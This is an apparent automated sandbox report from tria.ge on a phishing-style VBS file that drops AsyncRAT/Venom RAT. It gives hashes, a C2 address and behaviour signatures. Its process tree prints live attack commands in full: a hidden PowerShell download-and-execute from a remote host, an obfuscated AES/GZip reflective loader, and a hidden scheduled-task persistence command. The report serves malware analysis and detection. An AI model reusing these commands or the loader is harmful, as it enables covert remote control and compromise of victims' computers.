Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Round Trip...ls.vbs

windows7-x64

8

Round Trip...ls.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    126s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/12/2024, 14:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Round Trip Itinerary details.vbs

  • Size

    78KB

  • MD5

    ab631b79a8f6cc0f48e17765c33c8fee

  • SHA1

    539298c574b25b70379fccd8c47c3dbee5184877

  • SHA256

    f24da1d458f078adf96dca79955313eea5cfe7a6a36334b1352553a31928cec6

  • SHA512

    0e5818d2c4eca342c7b8ece7c8f14028e34d00e2c83f0d3c72ceaeb0380fc568ceb02df8e5743b9a691d85cc462863bceb68ccb1cf499994fe0e523debe6e550

  • SSDEEP

    1536:rtYq5Mv5eaBf+kvAQKCidRC0Xe6Tw/LP5KU52t+gN4:lmRea3vAWGOyZsu4

Score
10/10
asyncratdefaultexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

45.149.241.239:1978

Mutex

ewdlylafhlapsawrztd

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Round Trip Itinerary details.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3124
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:116
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4524
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xZeq9DIcMp8T9I70bsZRE1uAqlMKnnwxo9STrCb0BJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wSiqGPKdEt2A2oq502N0Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WbLZH=New-Object System.IO.MemoryStream(,$param_var); $YROuh=New-Object System.IO.MemoryStream; $FnRtc=New-Object System.IO.Compression.GZipStream($WbLZH, [IO.Compression.CompressionMode]::Decompress); $FnRtc.CopyTo($YROuh); $FnRtc.Dispose(); $WbLZH.Dispose(); $YROuh.Dispose(); $YROuh.ToArray();}function execute_function($param_var,$param2_var){ $JFUbC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vIQTp=$JFUbC.EntryPoint; $vIQTp.Invoke($null, $param2_var);}$LMlhd = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $LMlhd;$qwcXI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LMlhd).Split([Environment]::NewLine);foreach ($RYDhX in $qwcXI) { if ($RYDhX.StartsWith('qSryZxtgHRJoDBkXgCTa')) { $MiSte=$RYDhX.Substring(20); break; }}$payloads_var=[string[]]$MiSte.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        3⤵
          PID:1480
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2256
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_165_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_165.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3872
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_165.vbs"
            4⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2432
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_165.bat" "
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4052
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xZeq9DIcMp8T9I70bsZRE1uAqlMKnnwxo9STrCb0BJQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wSiqGPKdEt2A2oq502N0Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WbLZH=New-Object System.IO.MemoryStream(,$param_var); $YROuh=New-Object System.IO.MemoryStream; $FnRtc=New-Object System.IO.Compression.GZipStream($WbLZH, [IO.Compression.CompressionMode]::Decompress); $FnRtc.CopyTo($YROuh); $FnRtc.Dispose(); $WbLZH.Dispose(); $YROuh.Dispose(); $YROuh.ToArray();}function execute_function($param_var,$param2_var){ $JFUbC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vIQTp=$JFUbC.EntryPoint; $vIQTp.Invoke($null, $param2_var);}$LMlhd = 'C:\Users\Admin\AppData\Roaming\Windows_Log_165.bat';$host.UI.RawUI.WindowTitle = $LMlhd;$qwcXI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LMlhd).Split([Environment]::NewLine);foreach ($RYDhX in $qwcXI) { if ($RYDhX.StartsWith('qSryZxtgHRJoDBkXgCTa')) { $MiSte=$RYDhX.Substring(20); break; }}$payloads_var=[string[]]$MiSte.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                6⤵
                  PID:1216
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:4780

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        2KB

        MD5

        005bc2ef5a9d890fb2297be6a36f01c2

        SHA1

        0c52adee1316c54b0bfdc510c0963196e7ebb430

        SHA256

        342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

        SHA512

        f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        aa8efa56e1e40374bbd21e0e469dceb7

        SHA1

        33a592799d4898c6efdd29e132f2f76ec51dbc08

        SHA256

        25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf

        SHA512

        ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lyhmwg0p.1gt.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\system.bat
        Filesize

        69KB

        MD5

        9a7ec81cc371860d03b51764e8eade97

        SHA1

        3a22f9120587dc2fc84765efde70586fd0775fdf

        SHA256

        20a77dbb7b4438cc9cfa45e1a3de33b7100b039ca7f8838a12d09273f55dbe3e

        SHA512

        9d3a4c525b0f811ab9fb57787c16ce32dcba714fea558c5f3364703a20f232ece58a83c0edf3294a62d92ce52b3878f50f1c30ef6687d1e37e855f0f069331bb

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Windows_Log_165.vbs
        Filesize

        115B

        MD5

        6b2203916f3eed5356bc4e70ddc3dc10

        SHA1

        cf7f4c3e5dac7ecbb14d5cdc0b4b8f7f4131cd86

        SHA256

        382d6d7ce066622687cef0cff35de6ffbb8b9090fc4de2fe208f9b7bc1a05223

        SHA512

        1757c68e4366a3ed681c28ac4b891c3616f3b225805a9dcdb9700d22819a69573d09f9c47800f7efc37acfa4aec76853c957a86f2f4d3a0346aa48419829e164

        Download Submit

      • memory/116-12-0x00007FF80F380000-0x00007FF80FE41000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/116-17-0x00007FF80F380000-0x00007FF80FE41000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/116-14-0x00007FF80F380000-0x00007FF80FE41000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/116-13-0x00007FF80F380000-0x00007FF80FE41000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/116-0-0x00007FF80F383000-0x00007FF80F385000-memory.dmp

        Filesize

        8KB

        Download

      • memory/116-11-0x00007FF80F380000-0x00007FF80FE41000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/116-10-0x0000020811F80000-0x0000020811FA2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2256-32-0x00000255763E0000-0x0000025576424000-memory.dmp

        Filesize

        272KB

        Download

      • memory/2256-33-0x0000025576850000-0x00000255768C6000-memory.dmp

        Filesize

        472KB

        Download

      • memory/2256-34-0x0000025574210000-0x0000025574218000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2256-35-0x0000025574220000-0x0000025574232000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4780-64-0x000001FFF1CC0000-0x000001FFF1CD8000-memory.dmp

        Filesize

        96KB

        Download